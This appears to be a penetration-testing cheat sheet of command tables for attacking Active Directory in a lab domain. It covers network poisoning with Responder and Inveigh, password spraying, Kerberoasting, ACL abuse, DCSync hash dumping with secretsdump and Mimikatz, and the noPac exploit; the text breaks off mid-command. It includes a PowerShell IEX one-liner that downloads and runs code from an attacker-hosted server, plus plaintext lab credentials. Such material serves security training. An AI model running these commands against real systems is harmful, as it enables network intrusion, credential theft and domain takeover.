# Active Directory Enumeration & Attacks ## Initial Enumeration | Command | Description | | --------------------------------------------------------------------------------------------------- | ----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- | | `nslookup ns1.inlanefreight.com` | Used to query the domain name system and discover the IP address to domain name mapping of the target entered from a Linux-based host. | | `sudo tcpdump -i ens224` | Used to start capturing network packets on the network interface proceeding the `-i` option a Linux-based host. | | `sudo responder -I ens224 -A` | Used to start responding to & analyzing `LLMNR`, `NBT-NS` and `MDNS` queries on the interface specified proceeding the `-I` option and operating in `Passive Analysis` mode which is activated using `-A`. Performed from a Linux-based host | | `fping -asgq 172.16.5.0/23` | Performs a ping sweep on the specified network segment from a Linux-based host. | | `sudo nmap -v -A -iL hosts.txt -oN /home/User/Documents/host-enum` | Performs an nmap scan that with OS detection, version detection, script scanning, and traceroute enabled (`-A`) based on a list of hosts (`hosts.txt`) specified in the file proceeding `-iL`. Then outputs the scan results to the file specified after the `-oN`option. Performed from a Linux-based host | | `sudo git clone https://github.com/ropnop/kerbrute.git` | Uses `git` to clone the kerbrute tool from a Linux-based host. | | `make help` | Used to list compiling options that are possible with `make` from a Linux-based host. | | `sudo make all` | Used to compile a `Kerbrute` binary for multiple OS platforms and CPU architectures. | | `./kerbrute_linux_amd64` | Used to test the chosen complied `Kebrute` binary from a Linux-based host. | | `sudo mv kerbrute_linux_amd64 /usr/local/bin/kerbrute` | Used to move the `Kerbrute` binary to a directory can be set to be in a Linux user's path. Making it easier to use the tool. | | `./kerbrute_linux_amd64 userenum -d INLANEFREIGHT.LOCAL --dc 172.16.5.5 jsmith.txt -o kerb-results` | Runs the Kerbrute tool to discover usernames in the domain (`INLANEFREIGHT.LOCAL`) specified proceeding the `-d` option and the associated domain controller specified proceeding `--dc`using a wordlist and outputs (`-o`) the results to a specified file. Performed from a Linux-based host. | ## LLMNR/NTB-NS Poisoning | Command | Description | | ------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- | ------------------------------------------------------------------------------------------------------------------------------------------------------------------------ | | `responder -h` | Used to display the usage instructions and various options available in `Responder` from a Linux-based host. | | `hashcat -m 5600 forend_ntlmv2 /usr/share/wordlists/rockyou.txt` | Uses `hashcat` to crack `NTLMv2` (`-m`) hashes that were captured by responder and saved in a file (`frond_ntlmv2`). The cracking is done based on a specified wordlist. | | `Import-Module .\Inveigh.ps1` | Using the `Import-Module` PowerShell cmd-let to import the Windows-based tool `Inveigh.ps1`. | | `(Get-Command Invoke-Inveigh).Parameters` | Used to output many of the options & functionality available with `Invoke-Inveigh`. Peformed from a Windows-based host. | | `Invoke-Inveigh Y -NBNS Y -ConsoleOutput Y -FileOutput Y` | Starts `Inveigh` on a Windows-based host with LLMNR & NBNS spoofing enabled and outputs the results to a file. | | `.\Inveigh.exe` | Starts the `C#` implementation of `Inveigh` from a Windows-based host. | | `$regkey = "HKLM:SYSTEM\CurrentControlSet\services\NetBT\Parameters\Interfaces" Get-ChildItem $regkey \|foreach { Set-ItemProperty -Path "$regkey\$($_.pschildname)" -Name NetbiosOptions -Value 2 -Verbose}` | PowerShell script used to disable NBT-NS on a Windows host. | ## Password Spraying & Password Policies | Command | Description | | ------------------------------------------------------------------------------------------------------------------------------------ | ---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- | | `#!/bin/bash for x in {{A..Z},{0..9}}{{A..Z},{0..9}}{{A..Z},{0..9}}{{A..Z},{0..9}} do echo $x; done` | Bash script used to generate `16,079,616` possible username combinations from a Linux-based host. | | `crackmapexec smb 172.16.5.5 -u avazquez -p Password123 --pass-pol` | Uses `CrackMapExec`and valid credentials (`avazquez:Password123`) to enumerate the password policy (`--pass-pol`) from a Linux-based host. | | `rpcclient -U "" -N 172.16.5.5` | Uses `rpcclient` to discover information about the domain through `SMB NULL` sessions. Performed from a Linux-based host. | | `rpcclient $> querydominfo` | Uses `rpcclient` to enumerate the password policy in a target Windows domain from a Linux-based host. | | `enum4linux -P 172.16.5.5` | Uses `enum4linux` to enumerate the password policy (`-P`) in a target Windows domain from a Linux-based host. | | `enum4linux-ng -P 172.16.5.5 -oA ilfreight` | Uses `enum4linux-ng` to enumerate the password policy (`-P`) in a target Windows domain from a Linux-based host, then presents the output in YAML & JSON saved in a file proceeding the `-oA` option. | | `ldapsearch -h 172.16.5.5 -x -b "DC=INLANEFREIGHT,DC=LOCAL" -s sub "*" \| grep -m 1 -B 10 pwdHistoryLength` | Uses `ldapsearch` to enumerate the password policy in a target Windows domain from a Linux-based host. | | `net accounts` | Used to enumerate the password policy in a Windows domain from a Windows-based host. | | `Import-Module .\PowerView.ps1` | Uses the Import-Module cmd-let to import the `PowerView.ps1` tool from a Windows-based host. | | `Get-DomainPolicy` | Used to enumerate the password policy in a target Windows domain from a Windows-based host. | | `enum4linux -U 172.16.5.5 \| grep "user:" \| cut -f2 -d"[" \| cut -f1 -d"]"` | Uses `enum4linux` to discover user accounts in a target Windows domain, then leverages `grep` to filter the output to just display the user from a Linux-based host. | | `rpcclient -U "" -N 172.16.5.5 rpcclient $> enumdomuser` | Uses rpcclient to discover user accounts in a target Windows domain from a Linux-based host. | | `crackmapexec smb 172.16.5.5 --users` | Uses `CrackMapExec` to discover users (`--users`) in a target Windows domain from a Linux-based host. | | `ldapsearch -h 172.16.5.5 -x -b "DC=INLANEFREIGHT,DC=LOCAL" -s sub "(&(objectclass=user))" \| grep sAMAccountName: \| cut -f2 -d" "` | Uses `ldapsearch` to discover users in a target Windows doman, then filters the output using `grep` to show only the `sAMAccountName` from a Linux-based host. | | `./windapsearch.py --dc-ip 172.16.5.5 -u "" -U` | Uses the python tool `windapsearch.py` to discover users in a target Windows domain from a Linux-based host. | | `for u in $(cat valid_users.txt);do rpcclient -U "$u%Welcome1" -c "getusername;quit" 172.16.5.5 \| grep Authority; done` | Bash one-liner used to perform a password spraying attack using `rpcclient` and a list of users (`valid_users.txt`) from a Linux-based host. It also filters out failed attempts to make the output cleaner. | | `kerbrute passwordspray -d inlanefreight.local --dc 172.16.5.5 valid_users.txt Welcome1` | Uses `kerbrute` and a list of users (`valid_users.txt`) to perform a password spraying attack against a target Windows domain from a Linux-based host. | | `sudo crackmapexec smb 172.16.5.5 -u valid_users.txt -p Password123 \| grep +` | Uses `CrackMapExec` and a list of users (`valid_users.txt`) to perform a password spraying attack against a target Windows domain from a Linux-based host. It also filters out logon failures using `grep`. | | `sudo crackmapexec smb 172.16.5.5 -u avazquez -p Password123` | Uses `CrackMapExec` to validate a set of credentials from a Linux-based host. | | `sudo crackmapexec smb --local-auth 172.16.5.0/24 -u administrator -H 88ad09182de639ccc6579eb0849751cf \| grep +` | Uses `CrackMapExec` and the -`-local-auth` flag to ensure only one login attempt is performed from a Linux-based host. This is to ensure accounts are not locked out by enforced password policies. It also filters out logon failures using `grep`. | | `Import-Module .\DomainPasswordSpray.ps1` | Used to import the PowerShell-based tool `DomainPasswordSpray.ps1` from a Windows-based host. | | `Invoke-DomainPasswordSpray -Password Welcome1 -OutFile spray_success -ErrorAction SilentlyContinue` | Performs a password spraying attack and outputs (-OutFile) the results to a specified file (`spray_success`) from a Windows-based host. | ## Enumerating Security Controls | Command | Description | | -------------------------------------------------------------------------- | -------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- | | `Get-MpComputerStatus` | PowerShell cmd-let used to check the status of `Windows Defender Anti-Virus` from a Windows-based host. | | `Get-AppLockerPolicy -Effective \| select -ExpandProperty RuleCollections` | PowerShell cmd-let used to view `AppLocker` policies from a Windows-based host. | | `$ExecutionContext.SessionState.LanguageMode` | PowerShell script used to discover the `PowerShell Language Mode` being used on a Windows-based host. Performed from a Windows-based host. | | `Find-LAPSDelegatedGroups` | A `LAPSToolkit` function that discovers `LAPS Delegated Groups` from a Windows-based host. | | `Find-AdmPwdExtendedRights` | A `LAPSTookit` function that checks the rights on each computer with LAPS enabled for any groups with read access and users with `All Extended Rights`. Performed from a Windows-based host. | | `Get-LAPSComputers` | A `LAPSToolkit` function that searches for computers that have LAPS enabled, discover password expiration and can discover randomized passwords. Performed from a Windows-based host. | ## Credentialed Enumeration | Command | Description | | ------------------------------------------------------------------------------------------------ | --------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- | | `xfreerdp /u:forend@inlanefreight.local /p:Klmcargo2 /v:172.16.5.25` | Connects to a Windows target using valid credentials. Performed from a Linux-based host. | | `sudo crackmapexec smb 172.16.5.5 -u forend -p Klmcargo2 --users` | Authenticates with a Windows target over `smb` using valid credentials and attempts to discover more users (`--users`) in a target Windows domain. Performed from a Linux-based host. | | `sudo crackmapexec smb 172.16.5.5 -u forend -p Klmcargo2 --groups` | Authenticates with a Windows target over `smb` using valid credentials and attempts to discover groups (`--groups`) in a target Windows domain. Performed from a Linux-based host. | | `sudo crackmapexec smb 172.16.5.125 -u forend -p Klmcargo2 --loggedon-users` | Authenticates with a Windows target over `smb` using valid credentials and attempts to check for a list of logged on users (`--loggedon-users`) on the target Windows host. Performed from a Linux-based host. | | `sudo crackmapexec smb 172.16.5.5 -u forend -p Klmcargo2 --shares` | Authenticates with a Windows target over `smb` using valid credentials and attempts to discover any smb shares (`--shares`). Performed from a Linux-based host. | | `sudo crackmapexec smb 172.16.5.5 -u forend -p Klmcargo2 -M spider_plus --share Dev-share` | Authenticates with a Windows target over `smb` using valid credentials and utilizes the CrackMapExec module (`-M`) `spider_plus` to go through each readable share (`Dev-share`) and list all readable files. The results are outputted in `JSON`. Performed from a Linux-based host. | | `smbmap -u forend -p Klmcargo2 -d INLANEFREIGHT.LOCAL -H 172.16.5.5` | Enumerates the target Windows domain using valid credentials and lists shares & permissions available on each within the context of the valid credentials used and the target Windows host (`-H`). Performed from a Linux-based host. | | `smbmap -u forend -p Klmcargo2 -d INLANEFREIGHT.LOCAL -H 172.16.5.5 -R SYSVOL --dir-only` | Enumerates the target Windows domain using valid credentials and performs a recursive listing (`-R`) of the specified share (`SYSVOL`) and only outputs a list of directories (`--dir-only`) in the share. Performed from a Linux-based host. | | `rpcclient $> queryuser 0x457` | Enumerates a target user account in a Windows domain using its relative identifier (`0x457`). Performed from a Linux-based host. | | `rpcclient $> enumdomusers` | Discovers user accounts in a target Windows domain and their associated relative identifiers (`rid`). Performed from a Linux-based host. | | `psexec.py inlanefreight.local/wley:'transporter@4'@172.16.5.125` | Impacket tool used to connect to the `CLI` of a Windows target via the `ADMIN$` administrative share with valid credentials. Performed from a Linux-based host. | | `wmiexec.py inlanefreight.local/wley:'transporter@4'@172.16.5.5` | Impacket tool used to connect to the `CLI` of a Windows target via `WMI` with valid credentials. Performed from a Linux-based host. | | `windapsearch.py -h` | Used to display the options and functionality of windapsearch.py. Performed from a Linux-based host. | | `python3 windapsearch.py --dc-ip 172.16.5.5 -u inlanefreight\wley -p Klmcargo2 --da` | Used to enumerate the domain admins group (`--da`) using a valid set of credentials on a target Windows domain. Performed from a Linux-based host. | | `python3 windapsearch.py --dc-ip 172.16.5.5 -u inlanefreight\wley -p Klmcargo2 -PU` | Used to perform a recursive search (`-PU`) for users with nested permissions using valid credentials. Performed from a Linux-based host. | | `sudo bloodhound-python -u 'forend' -p 'Klmcargo2' -ns 172.16.5.5 -d inlanefreight.local -c all` | Executes the python implementation of BloodHound (`bloodhound.py`) with valid credentials and specifies a name server (`-ns`) and target Windows domain (`inlanefreight.local`) as well as runs all checks (`-c all`). Runs using valid credentials. Performed from a Linux-based host. | ## Enumeration by Living Off the Land | Command | Description | | ---------------------------------------------------------------------------------------- | ----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- | | `Get-Module` | PowerShell cmd-let used to list all available modules, their version and command options from a Windows-based host. | | `Import-Module ActiveDirectory` | Loads the `Active Directory` PowerShell module from a Windows-based host. | | `Get-ADDomain` | PowerShell cmd-let used to gather Windows domain information from a Windows-based host. | | `Get-ADUser -Filter {ServicePrincipalName -ne "$null"} -Properties ServicePrincipalName` | PowerShell cmd-let used to enumerate user accounts on a target Windows domain and filter by `ServicePrincipalName`. Performed from a Windows-based host. | | `Get-ADTrust -Filter *` | PowerShell cmd-let used to enumerate any trust relationships in a target Windows domain and filters by any (`-Filter *`). Performed from a Windows-based host. | | `Get-ADGroup -Filter * \| select name` | PowerShell cmd-let used to enumerate groups in a target Windows domain and filters by the name of the group (`select name`). Performed from a Windows-based host. | | `Get-ADGroup -Identity "Backup Operators"` | PowerShell cmd-let used to search for a specifc group (`-Identity "Backup Operators"`). Performed from a Windows-based host. | | `Get-ADGroupMember -Identity "Backup Operators"` | PowerShell cmd-let used to discover the members of a specific group (`-Identity "Backup Operators"`). Performed from a Windows-based host. | | `Export-PowerViewCSV` | PowerView script used to append results to a `CSV` file. Performed from a Windows-based host. | | `ConvertTo-SID` | PowerView script used to convert a `User` or `Group` name to it's `SID`. Performed from a Windows-based host. | | `Get-DomainSPNTicket` | PowerView script used to request the kerberos ticket for a specified service principal name (`SPN`). Performed from a Windows-based host. | | `Get-Domain` | PowerView script used tol return the AD object for the current (or specified) domain. Performed from a Windows-based host. | | `Get-DomainController` | PowerView script used to return a list of the target domain controllers for the specified target domain. Performed from a Windows-based host. | | `Get-DomainUser` | PowerView script used to return all users or specific user objects in AD. Performed from a Windows-based host. | | `Get-DomainComputer` | PowerView script used to return all computers or specific computer objects in AD. Performed from a Windows-based host. | | `Get-DomainGroup` | PowerView script used to eturn all groups or specific group objects in AD. Performed from a Windows-based host. | | `Get-DomainOU` | PowerView script used to search for all or specific OU objects in AD. Performed from a Windows-based host. | | `Find-InterestingDomainAcl` | PowerView script used to find object `ACLs` in the domain with modification rights set to non-built in objects. Performed from a Windows-based host. | | `Get-DomainGroupMember` | PowerView script used to return the members of a specific domain group. Performed from a Windows-based host. | | `Get-DomainFileServer` | PowerView script used to return a list of servers likely functioning as file servers. Performed from a Windows-based host. | | `Get-DomainDFSShare` | PowerView script used to return a list of all distributed file systems for the current (or specified) domain. Performed from a Windows-based host. | | `Get-DomainGPO` | PowerView script used to return all GPOs or specific GPO objects in AD. Performed from a Windows-based host. | | `Get-DomainPolicy` | PowerView script used to return the default domain policy or the domain controller policy for the current domain. Performed from a Windows-based host. | | `Get-NetLocalGroup` | PowerView script used to enumerate local groups on a local or remote machine. Performed from a Windows-based host. | | `Get-NetLocalGroupMember` | PowerView script enumerate members of a specific local group. Performed from a Windows-based host. | | `Get-NetShare` | PowerView script used to return a list of open shares on a local (or a remote) machine. Performed from a Windows-based host. | | `Get-NetSession` | PowerView script used to return session information for the local (or a remote) machine. Performed from a Windows-based host. | | `Test-AdminAccess` | PowerView script used to test if the current user has administrative access to the local (or a remote) machine. Performed from a Windows-based host. | | `Find-DomainUserLocation` | PowerView script used to find machines where specific users are logged into. Performed from a Windows-based host. | | `Find-DomainShare` | PowerView script used to find reachable shares on domain machines. Performed from a Windows-based host. | | `Find-InterestingDomainShareFile` | PowerView script that searches for files matching specific criteria on readable shares in the domain. Performed from a Windows-based host. | | `Find-LocalAdminAccess` | PowerView script used to find machines on the local domain where the current user has local administrator access Performed from a Windows-based host. | | `Get-DomainTrust` | PowerView script that returns domain trusts for the current domain or a specified domain. Performed from a Windows-based host. | | `Get-ForestTrust` | PowerView script that returns all forest trusts for the current forest or a specified forest. Performed from a Windows-based host. | | `Get-DomainForeignUser` | PowerView script that enumerates users who are in groups outside of the user's domain. Performed from a Windows-based host. | | `Get-DomainForeignGroupMember` | PowerView script that enumerates groups with users outside of the group's domain and returns each foreign member. Performed from a Windows-based host. | | `Get-DomainTrustMapping` | PowerView script that enumerates all trusts for current domain and any others seen. Performed from a Windows-based host. | | `Get-DomainGroupMember -Identity "Domain Admins" -Recurse` | PowerView script used to list all the members of a target group (`"Domain Admins"`) through the use of the recurse option (`-Recurse`). Performed from a Windows-based host. | | `Get-DomainUser -SPN -Properties samaccountname,ServicePrincipalName` | PowerView script used to find users on the target Windows domain that have the `Service Principal Name` set. Performed from a Windows-based host. | | `.\Snaffler.exe -d INLANEFREIGHT.LOCAL -s -v data` | Runs a tool called `Snaffler` against a target Windows domain that finds various kinds of data in shares that the compromised account has access to. Performed from a Windows-based host. | ## Transfering Files | Command | Description | | ------------------------------------------------------------------------------------------------------------------------ | ---------------------------------------------------------------------------------------------------- | | `sudo python3 -m http.server 8001` | Starts a python web server for quick hosting of files. Performed from a Linux-basd host. | | `"IEX(New-Object Net.WebClient).downloadString('http://172.16.5.222/SharpHound.exe')"` | PowerShell one-liner used to download a file from a web server. Performed from a Windows-based host. | | `impacket-smbserver -ip 172.16.5.x -smb2support -username user -password password shared /home/administrator/Downloads/` | Starts a impacket `SMB` server for quick hosting of a file. Performed from a Windows-based host. | ## Kerberoasting | Command | Description | | ------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------ | ------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------ | | `sudo python3 -m pip install .` | Used to install Impacket from inside the directory that gets cloned to the attack host. Performed from a Linux-based host. | | `GetUserSPNs.py -h` | Impacket tool used to display the options and functionality of `GetUserSPNs.py` from a Linux-based host. | | `GetUserSPNs.py -dc-ip 172.16.5.5 INLANEFREIGHT.LOCAL/mholliday` | Impacket tool used to get a list of `SPNs` on the target Windows domain from a Linux-based host. | | `GetUserSPNs.py -dc-ip 172.16.5.5 INLANEFREIGHT.LOCAL/mholliday -request` | Impacket tool used to download/request (`-request`) all TGS tickets for offline processing from a Linux-based host. | | `GetUserSPNs.py -dc-ip 172.16.5.5 INLANEFREIGHT.LOCAL/mholliday -request-user sqldev` | Impacket tool used to download/request (`-request-user`) a TGS ticket for a specific user account (`sqldev`) from a Linux-based host. | | `GetUserSPNs.py -dc-ip 172.16.5.5 INLANEFREIGHT.LOCAL/mholliday -request-user sqldev -outputfile sqldev_tgs` | Impacket tool used to download/request a TGS ticket for a specific user account and write the ticket to a file (`-outputfile sqldev_tgs`) linux-based host. | | `hashcat -m 13100 sqldev_tgs /usr/share/wordlists/rockyou.txt --force` | Attempts to crack the Kerberos (`-m 13100`) ticket hash (`sqldev_tgs`) using `hashcat` and a wordlist (`rockyou.txt`) from a Linux-based host. | | `setspn.exe -Q */*` | Used to enumerate `SPNs` in a target Windows domain from a Windows-based host. | | `Add-Type -AssemblyName System.IdentityModel New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList "MSSQLSvc/DEV-PRE-SQL.inlanefreight.local:1433"` | PowerShell script used to download/request the TGS ticket of a specific user from a Windows-based host. | | `setspn.exe -T INLANEFREIGHT.LOCAL -Q */* \| Select-String '^CN' -Context 0,1 \| % { New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList $_.Context.PostContext[0].Trim() }` | Used to download/request all TGS tickets from a WIndows-based host. | | `mimikatz # base64 /out:true` | `Mimikatz` command that ensures TGS tickets are extracted in `base64` format from a Windows-based host. | | `kerberos::list /export` | `Mimikatz` command used to extract the TGS tickets from a Windows-based host. | | `echo "" \| tr -d \` | Used to prepare the base64 formatted TGS ticket for cracking from Linux-based host. | | `cat encoded_file \| base64 -d > sqldev.kirbi` | Used to output a file (`encoded_file`) into a .kirbi file in base64 (`base64 -d > sqldev.kirbi`) format from a Linux-based host. | | `python2.7 kirbi2john.py sqldev.kirbi` | Used to extract the `Kerberos ticket`. This also creates a file called `crack_file` from a Linux-based host. | | `sed 's/\$krb5tgs\$\(.*\):\(.*\)/\$krb5tgs\$23\$\*\1\*\$\2/' crack_file > sqldev_tgs_hashcat` | Used to modify the `crack_file` for `Hashcat` from a Linux-based host. | | `cat sqldev_tgs_hashcat` | Used to view the prepared hash from a Linux-based host. | | `hashcat -m 13100 sqldev_tgs_hashcat /usr/share/wordlists/rockyou.txt` | Used to crack the prepared Kerberos ticket hash (`sqldev_tgs_hashcat`) using a wordlist (`rockyou.txt`) from a Linux-based host. | | `Import-Module .\PowerView.ps1 Get-DomainUser * -spn \| select samaccountname` | Uses PowerView tool to extract `TGS Tickets` . Performed from a Windows-based host. | | `Get-DomainUser -Identity sqldev \| Get-DomainSPNTicket -Format Hashcat` | PowerView tool used to download/request the TGS ticket of a specific ticket and automatically format it for `Hashcat` from a Windows-based host. | | `Get-DomainUser * -SPN \| Get-DomainSPNTicket -Format Hashcat \| Export-Csv .\ilfreight_tgs.csv -NoTypeInformation` | Exports all TGS tickets to a `.CSV` file (`ilfreight_tgs.csv`) from a Windows-based host. | | `cat .\ilfreight_tgs.csv` | Used to view the contents of the .csv file from a Windows-based host. | | `.\Rubeus.exe` | Used to view the options and functionality possible with the tool `Rubeus`. Performed from a Windows-based host. | | `.\Rubeus.exe kerberoast /stats` | Used to check the kerberoast stats (`/stats`) within the target Windows domain from a Windows-based host. | | `.\Rubeus.exe kerberoast /ldapfilter:'admincount=1' /nowrap` | Used to request/download TGS tickets for accounts with the `admin` count set to `1` then formats the output in an easy to view & crack manner (`/nowrap`) . Performed from a Windows-based host. | | `.\Rubeus.exe kerberoast /user:testspn /nowrap` | Used to request/download a TGS ticket for a specific user (`/user:testspn`) the formats the output in an easy to view & crack manner (`/nowrap`). Performed from a Windows-based host. | | `Get-DomainUser testspn -Properties samaccountname,serviceprincipalname,msds-supportedencryptiontypes` | PowerView tool used to check the `msDS-SupportedEncryptionType` attribute associated with a specific user account (`testspn`). Performed from a Windows-based host. | | `hashcat -m 13100 rc4_to_crack /usr/share/wordlists/rockyou.txt` | Used to attempt to crack the ticket hash using a wordlist (`rockyou.txt`) from a Linux-based host . | ## ACL Enumeration & Tactics | Command | Description | | ------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------ | -------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- | | `Find-InterestingDomainAcl` | PowerView tool used to find object ACLs in the target Windows domain with modification rights set to non-built in objects from a Windows-based host. | | `Import-Module .\PowerView.ps1 $sid = Convert-NameToSid wley` | Used to import PowerView and retrieve the `SID` of a specific user account (`wley`) from a Windows-based host. | | `Get-DomainObjectACL -Identity * \| ? {$_.SecurityIdentifier -eq $sid}` | Used to find all Windows domain objects that the user has rights over by mapping the user's `SID` to the `SecurityIdentifier` property from a Windows-based host. | | `$guid= "00299570-246d-11d0-a768-00aa006e0529" Get-ADObject -SearchBase "CN=Extended-Rights,$((Get-ADRootDSE).ConfigurationNamingContext)" -Filter {ObjectClass -like 'ControlAccessRight'} -Properties * \| Select Name,DisplayName,DistinguishedName,rightsGuid \| ?{$_.rightsGuid -eq $guid} \| fl` | Used to perform a reverse search & map to a `GUID` value from a Windows-based host. | | `Get-DomainObjectACL -ResolveGUIDs -Identity * \| ? {$_.SecurityIdentifier -eq $sid}` | Used to discover a domain object's ACL by performing a search based on GUID's (`-ResolveGUIDs`) from a Windows-based host. | | `Get-ADUser -Filter * \| Select-Object -ExpandProperty SamAccountName > ad_users.txt` | Used to discover a group of user accounts in a target Windows domain and add the output to a text file (`ad_users.txt`) from a Windows-based host. | | `foreach($line in [System.IO.File]::ReadLines("C:\Users\htb-student\Desktop\ad_users.txt")) {get-acl "AD:\$(Get-ADUser $line)" \| Select-Object Path -ExpandProperty Access \| Where-Object {$_.IdentityReference -match 'INLANEFREIGHT\\wley'}}` | A `foreach loop` used to retrieve ACL information for each domain user in a target Windows domain by feeding each list of a text file(`ad_users.txt`) to the `Get-ADUser` cmdlet, then enumerates access rights of those users. Performed from a Windows-based host. | | `$SecPassword = ConvertTo-SecureString '' -AsPlainText -Force $Cred = New-Object System.Management.Automation.PSCredential('INLANEFREIGHT\wley', $SecPassword)` | Used to create a `PSCredential Object` from a Windows-based host. | | `$damundsenPassword = ConvertTo-SecureString 'Pwn3d_by_ACLs!' -AsPlainText -Force` | Used to create a `SecureString Object` from a Windows-based host. | | `Set-DomainUserPassword -Identity damundsen -AccountPassword $damundsenPassword -Credential $Cred -Verbose` | PowerView tool used to change the password of a specifc user (`damundsen`) on a target Windows domain from a Windows-based host. | | `Get-ADGroup -Identity "Help Desk Level 1" -Properties * \| Select -ExpandProperty Members` | PowerView tool used view the members of a target security group (`Help Desk Level 1`) from a Windows-based host. | | `Add-DomainGroupMember -Identity 'Help Desk Level 1' -Members 'damundsen' -Credential $Cred2 -Verbose` | PowerView tool used to add a specifc user (`damundsen`) to a specific security group (`Help Desk Level 1`) in a target Windows domain from a Windows-based host. | | `Get-DomainGroupMember -Identity "Help Desk Level 1" \| Select MemberName` | PowerView tool used to view the members of a specific security group (`Help Desk Level 1`) and output only the username of each member (`Select MemberName`) of the group from a Windows-based host. | | `Set-DomainObject -Credential $Cred2 -Identity adunn -SET @{serviceprincipalname='notahacker/LEGIT'} -Verbose` | PowerView tool used create a fake `Service Principal Name` given a sepecift user (`adunn`) from a Windows-based host. | | `Set-DomainObject -Credential $Cred2 -Identity adunn -Clear serviceprincipalname -Verbose` | PowerView tool used to remove the fake `Service Principal Name` created during the attack from a Windows-based host. | | `Remove-DomainGroupMember -Identity "Help Desk Level 1" -Members 'damundsen' -Credential $Cred2 -Verbose` | PowerView tool used to remove a specific user (`damundsent`) from a specific security group (`Help Desk Level 1`) from a Windows-based host. | | `ConvertFrom-SddlString` | PowerShell cmd-let used to covert an `SDDL string` into a readable format. Performed from a Windows-based host. | ## DCSync | Command | Description | | ----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- | ------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- | | `Get-DomainUser -Identity adunn \| select samaccountname,objectsid,memberof,useraccountcontrol \|fl` | PowerView tool used to view the group membership of a specific user (`adunn`) in a target Windows domain. Performed from a Windows-based host. | | `$sid= "S-1-5-21-3842939050-3880317879-2865463114-1164" Get-ObjectAcl "DC=inlanefreight,DC=local" -ResolveGUIDs \| ? { ($_.ObjectAceType -match 'Replication-Get')} \| ?{$_.SecurityIdentifier -match $sid} \| select AceQualifier, ObjectDN, ActiveDirectoryRights,SecurityIdentifier,ObjectAceType \| fl` | Used to create a variable called SID that is set equal to the SID of a user account. Then uses PowerView tool `Get-ObjectAcl` to check a specific user's replication rights. Performed from a Windows-based host. | | `secretsdump.py -outputfile inlanefreight_hashes -just-dc INLANEFREIGHT/adunn@172.16.5.5 -use-vss` | Impacket tool sed to extract NTLM hashes from the NTDS.dit file hosted on a target Domain Controller (`172.16.5.5`) and save the extracted hashes to an file (`inlanefreight_hashes`). Performed from a Linux-based host. | | `mimikatz # lsadump::dcsync /domain:INLANEFREIGHT.LOCAL /user:INLANEFREIGHT\administrator` | Uses `Mimikatz` to perform a `dcsync` attack from a Windows-based host. | ## Privileged Access | Command | Description | | ---------------------------------------------------------------------------------------------------------------------------------------- | ----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- | | `Get-NetLocalGroupMember -ComputerName ACADEMY-EA-MS01 -GroupName "Remote Desktop Users"` | PowerView based tool to used to enumerate the `Remote Desktop Users` group on a Windows target (`-ComputerName ACADEMY-EA-MS01`) from a Windows-based host. | | `Get-NetLocalGroupMember -ComputerName ACADEMY-EA-MS01 -GroupName "Remote Management Users"` | PowerView based tool to used to enumerate the `Remote Management Users` group on a Windows target (`-ComputerName ACADEMY-EA-MS01`) from a Windows-based host. | | `$password = ConvertTo-SecureString "Klmcargo2" -AsPlainText -Force` | Creates a variable (`$password`) set equal to the password (`Klmcargo2`) of a user from a Windows-based host. | | `$cred = new-object System.Management.Automation.PSCredential ("INLANEFREIGHT\forend", $password)` | Creates a variable (`$cred`) set equal to the username (`forend`) and password (`$password`) of a target domain account from a Windows-based host. | | `Enter-PSSession -ComputerName ACADEMY-EA-DB01 -Credential $cred` | Uses the PowerShell cmd-let `Enter-PSSession` to establish a PowerShell session with a target over the network (`-ComputerName ACADEMY-EA-DB01`) from a Windows-based host. Authenticates using credentials made in the 2 commands shown prior (`$cred` & `$password`). | | `evil-winrm -i 10.129.201.234 -u forend` | Used to establish a PowerShell session with a Windows target from a Linux-based host using `WinRM`. | | `Import-Module .\PowerUpSQL.ps1` | Used to import the `PowerUpSQL` tool. | | `Get-SQLInstanceDomain` | PowerUpSQL tool used to enumerate SQL server instances from a Windows-based host. | | `Get-SQLQuery -Verbose -Instance "172.16.5.150,1433" -username "inlanefreight\damundsen" -password "SQL1234!" -query 'Select @@version'` | PowerUpSQL tool used to connect to connect to a SQL server and query the version (`-query 'Select @@version'`) from a Windows-based host. | | `mssqlclient.py` | Impacket tool used to display the functionality and options provided with `mssqlclient.py` from a Linux-based host. | | `mssqlclient.py INLANEFREIGHT/DAMUNDSEN@172.16.5.150 -windows-auth` | Impacket tool used to connect to a MSSQL server from a Linux-based host. | | `SQL> help` | Used to display mssqlclient.py options once connected to a MSSQL server. | | `SQL> enable_xp_cmdshell` | Used to enable `xp_cmdshell stored procedure` that allows for executing OS commands via the database from a Linux-based host. | | `xp_cmdshell whoami /priv` | Used to enumerate rights on a system using `xp_cmdshell`. | ## NoPac | Command | Description | | --------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- | ---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- | | `sudo git clone https://github.com/Ridter/noPac.git` | Used to clone a `noPac` exploit using git. Performed from a Linux-based host. | | `sudo python3 scanner.py inlanefreight.local/forend:Klmcargo2 -dc-ip 172.16.5.5 -use-ldap` | Runs `scanner.py` to check if a target system is vulnerable to `noPac`/`Sam_The_Admin` from a Linux-based host. | | `sudo python3 noPac.py INLANEFREIGHT.LOCAL/forend:Klmcargo2 -dc-ip 172.16.5.5 -dc-host ACADEMY-EA-DC01 -shell --impersonate administrator -use-ldap` | Used to exploit the `noPac`/`Sam_The_Admin` vulnerability and gain a SYSTEM shell (`-shell`). Performed from a Linux-based host. | | `sudo python3 noPac.py 